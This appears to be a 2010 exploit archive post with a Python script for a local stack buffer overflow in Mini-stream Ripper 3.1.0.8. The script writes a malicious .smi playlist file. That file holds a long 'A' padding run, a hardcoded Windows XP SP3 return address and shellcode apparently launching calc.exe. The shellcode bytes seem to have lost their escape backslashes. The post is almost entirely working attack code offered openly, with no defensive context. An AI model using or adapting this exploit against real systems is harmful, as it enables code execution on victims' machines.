Mini-stream Ripper 3.1.0.8 => Local stack overflow exploi
Posted on 28 March 2010
========================================================== Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit ========================================================== # Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit # Author: Hazem Mofeed # Download: http://www.mini-stream.net/mini-stream-ripper/download/ # Home: http://hakxer.wordpress.com # [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited .. # http://inj3ct0r.com/exploits/11135 shellcode = ("xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0" "x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c" "x63x2ex65x78x65x00") # SP3(sh) # exploit exploit = ("x41" * 43496 + "x08x6Ax83x7C" + "x08x6Ax83x7C" + shellcode ) file = open("exploit.smi","w") file.write(exploit) file.close() # Inj3ct0r.com [2010-03-28]